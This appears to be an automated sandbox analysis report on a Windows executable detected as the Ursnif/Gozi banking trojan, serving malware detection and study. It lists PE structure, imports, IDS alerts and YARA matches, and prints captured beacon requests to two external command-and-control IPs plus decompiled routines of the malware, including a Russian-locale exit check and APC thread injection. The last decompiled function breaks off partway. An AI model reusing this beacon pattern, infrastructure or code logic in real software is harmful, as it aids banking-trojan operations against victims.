          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x43200x40.text
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d4.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x18a140x18c00False0.5078914141414141data6.317088322579259IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .data0x1a0000x90de80x13800False0.9289988982371795data7.819882002254561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0xab0000xdd080xde00False0.40874859234234234data4.401249226844183IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountry
          RT_CURSOR0xb6f480x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
          RT_CURSOR0xb70900x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
          RT_CURSOR0xb71c00xf0Device independent bitmap graphic, 24 x 48 x 1, image size 0
          RT_CURSOR0xb72b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
          RT_ICON0xab5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
          RT_ICON0xab5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
          RT_ICON0xab5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
          RT_ICON0xabe880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
          RT_ICON0xabe880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
          RT_ICON0xabe880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
          RT_ICON0xacf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
          RT_ICON0xacf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
          RT_ICON0xacf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
          RT_ICON0xad8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
          RT_ICON0xad8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
          RT_ICON0xad8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
          RT_ICON0xafda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
          RT_ICON0xafda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
          RT_ICON0xafda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
          RT_ICON0xb0e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishFinland
          RT_ICON0xb0e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishNorway
          RT_ICON0xb0e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishSweden
          RT_ICON0xb1d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishFinland
          RT_ICON0xb1d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishNorway
          RT_ICON0xb1d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishSweden
          RT_ICON0xb23f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishFinland
          RT_ICON0xb23f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishNorway
          RT_ICON0xb23f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishSweden
          RT_ICON0xb29580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
          RT_ICON0xb29580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
          RT_ICON0xb29580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
          RT_ICON0xb4f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
          RT_ICON0xb4f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
          RT_ICON0xb4f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
          RT_ICON0xb5fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishFinland
          RT_ICON0xb5fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishNorway
          RT_ICON0xb5fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishSweden
          RT_ICON0xb69300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishFinland
          RT_ICON0xb69300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishNorway
          RT_ICON0xb69300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishSweden
          RT_STRING0xb85d80x3bedataSami LappishFinland
          RT_STRING0xb85d80x3bedataSami LappishNorway
          RT_STRING0xb85d80x3bedataSami LappishSweden
          RT_STRING0xb89980x36adataSami LappishFinland
          RT_STRING0xb89980x36adataSami LappishNorway
          RT_STRING0xb89980x36adataSami LappishSweden
          RT_ACCELERATOR0xb6ea80x90dataSami LappishFinland
          RT_ACCELERATOR0xb6ea80x90dataSami LappishNorway
          RT_ACCELERATOR0xb6ea80x90dataSami LappishSweden
          RT_ACCELERATOR0xb6e000xa8dataSami LappishFinland
          RT_ACCELERATOR0xb6e000xa8dataSami LappishNorway
          RT_ACCELERATOR0xb6e000xa8dataSami LappishSweden
          RT_GROUP_CURSOR0xb70780x14data
          RT_GROUP_CURSOR0xb83580x30data
          RT_GROUP_ICON0xb0e500x30dataSami LappishFinland
          RT_GROUP_ICON0xb0e500x30dataSami LappishNorway
          RT_GROUP_ICON0xb0e500x30dataSami LappishSweden
          RT_GROUP_ICON0xacf300x22dataSami LappishFinland
          RT_GROUP_ICON0xacf300x22dataSami LappishNorway
          RT_GROUP_ICON0xacf300x22dataSami LappishSweden
          RT_GROUP_ICON0xb6d980x68dataSami LappishFinland
          RT_GROUP_ICON0xb6d980x68dataSami LappishNorway
          RT_GROUP_ICON0xb6d980x68dataSami LappishSweden
          RT_VERSION0xb83880x24cdata
          None0xb6f380xadataSami LappishFinland
          None0xb6f380xadataSami LappishNorway
          None0xb6f380xadataSami LappishSweden
          DLLImport
          KERNEL32.dllPulseEvent, ReadConsoleInputW, GetFirmwareEnvironmentVariableW, GetCPInfoExW, CreateEventW, CopyFileExA, GetProcAddress, GlobalAlloc, SetDefaultCommConfigA, OpenWaitableTimerW, GetFileAttributesW, EnumResourceTypesW, WriteFileGather, GetModuleHandleW, InterlockedCompareExchange, UnhandledExceptionFilter, LocalFlags, GlobalLock, GetConsoleAliasW, WritePrivateProfileSectionA, FindFirstVolumeMountPointA, SetLastError, SleepEx, AddAtomA, lstrcmpA, SetCalendarInfoA, GetSystemWindowsDirectoryA, EnumTimeFormatsW, GetSystemDirectoryW, AddAtomW, GetExitCodeThread, _llseek, FindNextFileW, CopyFileA, GetShortPathNameW, EnumCalendarInfoA, EnumCalendarInfoExA, AddRefActCtx, SetStdHandle, WriteConsoleW, GetCurrentThreadId, LoadLibraryA, CloseHandle, SetFilePointer, ReadFile, FlushFileBuffers, InterlockedIncrement, InterlockedDecrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetLastError, HeapFree, RtlUnwind, RaiseException, HeapReAlloc, HeapAlloc, MoveFileA, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, HeapCreate, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, LoadLibraryW, GetConsoleCP, GetConsoleMode, CreateFileW
          USER32.dllLoadMenuW
          ADVAPI32.dllLookupAccountSidW
          SHELL32.dllFindExecutableA
          ole32.dllCoGetInstanceFromFile
          Language of compilation systemCountry where language is spokenMap
          Sami LappishFinland
          Sami LappishNorway
          Sami LappishSweden
          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          192.168.2.562.173.142.5149699802033203 03/14/23-09:26:29.644541TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4969980192.168.2.562.173.142.51
          192.168.2.562.173.142.5149699802033204 03/14/23-09:26:29.644541TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4969980192.168.2.562.173.142.51
          192.168.2.594.103.183.15349700802033203 03/14/23-09:26:49.778257TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4970080192.168.2.594.103.183.153
          192.168.2.594.103.183.15349700802033204 03/14/23-09:26:49.778257TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4970080192.168.2.594.103.183.153
          TimestampSource PortDest PortSource IPDest IP
          Mar 14, 2023 09:26:29.584574938 CET4969980192.168.2.562.173.142.51
          Mar 14, 2023 09:26:29.643666029 CET804969962.173.142.51192.168.2.5
          Mar 14, 2023 09:26:29.644541025 CET4969980192.168.2.562.173.142.51
          Mar 14, 2023 09:26:29.644541025 CET4969980192.168.2.562.173.142.51
          Mar 14, 2023 09:26:29.703452110 CET804969962.173.142.51192.168.2.5
          Mar 14, 2023 09:26:29.704418898 CET804969962.173.142.51192.168.2.5
          Mar 14, 2023 09:26:29.707236052 CET4969980192.168.2.562.173.142.51
          Mar 14, 2023 09:26:29.709264994 CET4969980192.168.2.562.173.142.51
          Mar 14, 2023 09:26:29.767951965 CET804969962.173.142.51192.168.2.5
          Mar 14, 2023 09:26:49.717030048 CET4970080192.168.2.594.103.183.153
          Mar 14, 2023 09:26:49.774355888 CET804970094.103.183.153192.168.2.5
          Mar 14, 2023 09:26:49.774482965 CET4970080192.168.2.594.103.183.153
          Mar 14, 2023 09:26:49.778256893 CET4970080192.168.2.594.103.183.153
          Mar 14, 2023 09:26:49.835562944 CET804970094.103.183.153192.168.2.5
          Mar 14, 2023 09:26:49.835630894 CET804970094.103.183.153192.168.2.5
          Mar 14, 2023 09:26:49.835694075 CET4970080192.168.2.594.103.183.153
          Mar 14, 2023 09:26:49.835808992 CET4970080192.168.2.594.103.183.153
          Mar 14, 2023 09:26:49.893590927 CET804970094.103.183.153192.168.2.5
          TimestampSource PortDest PortSource IPDest IP
          Mar 14, 2023 09:25:09.418817997 CET5029553192.168.2.58.8.8.8
          Mar 14, 2023 09:25:09.443105936 CET53502958.8.8.8192.168.2.5
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Mar 14, 2023 09:25:09.418817997 CET192.168.2.58.8.8.80x8256Standard query (0)checklist.skype.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Mar 14, 2023 09:25:09.443105936 CET8.8.8.8192.168.2.50x8256Name error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false
          • 62.173.142.51
          • 94.103.183.153
          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.54969962.173.142.5180C:\Users\user\Desktop\server.exe
          TimestampkBytes transferredDirectionData
          Mar 14, 2023 09:26:29.644541025 CET105OUTGET /drew/LtSfNQUl38_2FDY/ZDiSMzVFZT8P12cRCR/wFifr57eD/E3QMnm3R09oCMKEqF_2B/hL6JR5JZ5RzfthDXDEL/QXKRNOEf5KUe4lOcOOnAWe/S7o7DbUVctcaA/rpMZ8DLG/JY7e7d4k8lkZ3XBI4AKdEOg/JVfUtdkUf4/lNi_2BCjIiDW9oaJC/JQY6K3BrLDok/oxD2Jl0W61e/9srw8Wtoy2vC2X/zMM4BIJQlabgMVrliSBbF/6bQOsnbMJ830WmQE/8fSuWxKUlXv_2FI/uixxrgswLUL3BF62nt/g_2FwBw.jlk HTTP/1.1
          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
          Host: 62.173.142.51
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortProcess
          1192.168.2.54970094.103.183.15380C:\Users\user\Desktop\server.exe
          TimestampkBytes transferredDirectionData
          Mar 14, 2023 09:26:49.778256893 CET106OUTGET /drew/45gwNn56tT_2B9DMppZLO6W/TY9yvuDrMO/NH6qQboGYLppgh3VY/fD0WTQxe_2Fc/8f_2F5pvK0k/5pc3M5q5_2FYt3/4jI4o0hOzWp0EtrTpDvY_/2BQflNotHm9IIPtO/mq9Dn1qgGdHgrmy/Xs1KDbSG454LVnULzq/seDw5rP1a/cxTqaNB2y_2FVHNjeaDU/t9me_2FSk8oJCJKH9Zx/OgVVwZaLyIQ6GcJMvVJZLX/3Iqej_2B4U8Se/qkLHdDp4/xkbU42A8qDuBydy0uePKn7_/2FGqiSuVoF/gyerokGYzhvdYj/f.jlk HTTP/1.1
          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
          Host: 94.103.183.153
          Connection: Keep-Alive
          Cache-Control: no-cache


          Click to jump to process

          Click to jump to process

          Target ID:0
          Start time:09:25:01
          Start date:14/03/2023
          Path:C:\Users\user\Desktop\server.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\server.exe
          Imagebase:0x400000
          File size:239104 bytes
          MD5 hash:0A7EFDF643E54621FE9B9E5A29C06FAF
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.565314294.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.440654861.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.440654861.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.440654861.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.440692855.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.440692855.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.440692855.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.440673519.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.440673519.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.440673519.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.440532933.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.440532933.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.440532933.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.440562879.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.440562879.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.440562879.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.565392988.0000000000620000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.565622070.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.565622070.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.565622070.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.440706160.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.440706160.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.440706160.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:low

          Reset < >

            Control-flow Graph

            C-Code - Quality: 85%
            			E004019F1() {
            				long _v8;
            				char _v12;
            				char _v16;
            				void* _v40;
            				long _t28;
            				long _t30;
            				long _t31;
            				signed short _t33;
            				void* _t37;
            				long _t40;
            				long _t41;
            				void* _t48;
            				intOrPtr _t50;
            				signed int _t57;
            				signed int _t58;
            				long _t63;
            				long _t65;
            				intOrPtr _t66;
            				void* _t71;
            				void* _t75;
            				signed int _t77;
            				signed int _t78;
            				void* _t82;
            				intOrPtr* _t83;
            
            				_t28 = E00401D68();
            				_v8 = _t28;
            				if(_t28 != 0) {
            					return _t28;
            				}
            				do {
            					_t77 = 0;
            					_v12 = 0;
            					_t63 = 0x30;
            					do {
            						_t71 = E004012E6(_t63);
            						if(_t71 == 0) {
            							_v8 = 8;
            						} else {
            							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
            							_t67 = _t57;
            							_t58 = _t57 & 0x0000ffff;
            							_v8 = _t58;
            							if(_t58 == 4) {
            								_t63 = _t63 + 0x30;
            							}
            							_t78 = 0x13;
            							_t10 = _t67 + 1; // 0x1
            							_t77 =  *_t71 % _t78 + _t10;
            							E00401BA9(_t71);
            						}
            					} while (_v8 != 0);
            					_t30 = E00401688(_t77); // executed
            					_v8 = _t30;
            					Sleep(_t77 << 4); // executed
            					_t31 = _v8;
            				} while (_t31 == 0x15);
            				if(_t31 != 0) {
            					L30:
            					return _t31;
            				}
            				_v12 = 0;
            				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
            				if(_t33 == 0) {
            					__imp__GetSystemDefaultUILanguage();
            					_t67 =  &_v12;
            					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
            				}
            				if(_v12 == 0x5552) {
            					L28:
            					_t31 = _v8;
            					if(_t31 == 0xffffffff) {
            						_t31 = GetLastError();
            					}
            					goto L30;
            				} else {
            					if(E00401800(_t67,  &_v16) != 0) {
            						 *0x404178 = 0;
            						L20:
            						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
            						_t82 = _t37;
            						if(_t82 == 0) {
            							L27:
            							_v8 = GetLastError();
            							goto L28;
            						}
            						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
            						if(_t40 == 0) {
            							_t65 = GetLastError();
            							TerminateThread(_t82, _t65);
            							CloseHandle(_t82);
            							_t82 = 0;
            							SetLastError(_t65);
            						}
            						if(_t82 == 0) {
            							goto L27;
            						} else {
            							_t41 = WaitForSingleObject(_t82, 0xffffffff);
            							_v8 = _t41;
            							if(_t41 == 0) {
            								GetExitCodeThread(_t82,  &_v8);
            							}
            							CloseHandle(_t82);
            							goto L28;
            						}
            					}
            					_t66 = _v16;
            					_t83 = __imp__GetLongPathNameW;
            					_t48 =  *_t83(_t66, 0, 0); // executed
            					_t75 = _t48;
            					if(_t75 == 0) {
            						L18:
            						 *0x404178 = _t66;
            						goto L20;
            					}
            					_t22 = _t75 + 2; // 0x2
            					_t50 = E004012E6(_t75 + _t22);
            					 *0x404178 = _t50;
            					if(_t50 == 0) {
            						goto L18;
            					}
            					 *_t83(_t66, _t50, _t75); // executed
            					E00401BA9(_t66);
            					goto L20;
            				}
            			}



























            0x004019f7
            0x004019fc
            0x00401a01
            0x00401ba8
            0x00401ba8
            0x00401a0a
            0x00401a0a
            0x00401a0e
            0x00401a11
            0x00401a12
            0x00401a18
            0x00401a1c
            0x00401a53
            0x00401a1e
            0x00401a26
            0x00401a2c
            0x00401a2e
            0x00401a33
            0x00401a39
            0x00401a3b
            0x00401a3b
            0x00401a42
            0x00401a48
            0x00401a48
            0x00401a4c
            0x00401a4c
            0x00401a5a
            0x00401a61
            0x00401a6a
            0x00401a6d
            0x00401a73
            0x00401a76
            0x00401a7f
            0x00401ba4
            0x00000000
            0x00401ba6
            0x00401a92
            0x00401a95
            0x00401a9d
            0x00401a9f
            0x00401aaa
            0x00401ab2
            0x00401ab2
            0x00401ac0
            0x00401b96
            0x00401b96
            0x00401b9c
            0x00401b9e
            0x00401b9e
            0x00000000
            0x00401ac6
            0x00401ad1
            0x00401b0f
            0x00401b15
            0x00401b27
            0x00401b2d
            0x00401b31
            0x00401b8d
            0x00401b93
            0x00000000
            0x00401b93
            0x00401b3d
            0x00401b4b
            0x00401b53
            0x00401b57
            0x00401b5e
            0x00401b61
            0x00401b63
            0x00401b63
            0x00401b6b
            0x00000000
            0x00401b6d
            0x00401b70
            0x00401b76
            0x00401b7b
            0x00401b82
            0x00401b82
            0x00401b89
            0x00000000
            0x00401b89
            0x00401b6b
            0x00401ad3
            0x00401ad8
            0x00401adf
            0x00401ae1
            0x00401ae5
            0x00401b07
            0x00401b07
            0x00000000
            0x00401b07
            0x00401ae7
            0x00401aec
            0x00401af1
            0x00401af8
            0x00000000
            0x00000000
            0x00401afd
            0x00401b00
            0x00000000
            0x00401b00

            APIs
              • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
              • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
              • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
              • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • NtQuerySystemInformation.NTDLL ref: 00401A26
            • Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A6D
            • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
            • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
            • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
            • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401ADF
            • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401AFD
            • CreateThread.KERNEL32 ref: 00401B27
            • QueueUserAPC.KERNEL32(0040139F,00000000,?,?,00000000), ref: 00401B3D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
            • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
            • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
            • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
            • String ID:
            • API String ID: 3475612337-0
            • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
            • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00574266
            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00574279
            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000,00000000), ref: 00574295
              • Part of subcall function 005733DC: RtlAllocateHeap.NTDLL(00000000,00000000,0057119A), ref: 005733E8
            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000,00000000), ref: 005742B2
            • memcpy.NTDLL(?,00000000,0000001C), ref: 005742BF
            • NtClose.NTDLL(?), ref: 005742D1
            • NtClose.NTDLL(00000000), ref: 005742DB
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
            • String ID:
            • API String ID: 2575439697-0
            • Opcode ID: 248e231d7d5e2248621a975987c1470bba7ee166ad03e5402c4017635667e0bf
            • Instruction ID: 1d9f90bff5abea05e9cb53b9a837315af6d3d206a47507321b657e7bbf0625be
            • Opcode Fuzzy Hash: 248e231d7d5e2248621a975987c1470bba7ee166ad03e5402c4017635667e0bf
            • Instruction Fuzzy Hash: 002107B1910229BBDB019F95EC49ADEBFBDFB58750F108026F909E6120D7718B54EBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 221 4015b0-401607 GetSystemTimeAsFileTime 224 401609 221->224 225 40160e-401627 CreateFileMappingW 221->225 224->225 226 401671-401677 GetLastError 225->226 227 401629-401632 225->227 228 401679-40167f 226->228 229 401642-401650 MapViewOfFile 227->229 230 401634-40163b GetLastError 227->230 231 401660-401666 GetLastError 229->231 232 401652-40165e 229->232 230->229 233 40163d-401640 230->233 231->228 234 401668-40166f CloseHandle 231->234 232->228 233->234 234->228
            C-Code - Quality: 69%
            			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
            				intOrPtr _v12;
            				struct _FILETIME* _v16;
            				short _v60;
            				struct _FILETIME* _t14;
            				intOrPtr _t15;
            				long _t18;
            				void* _t19;
            				void* _t22;
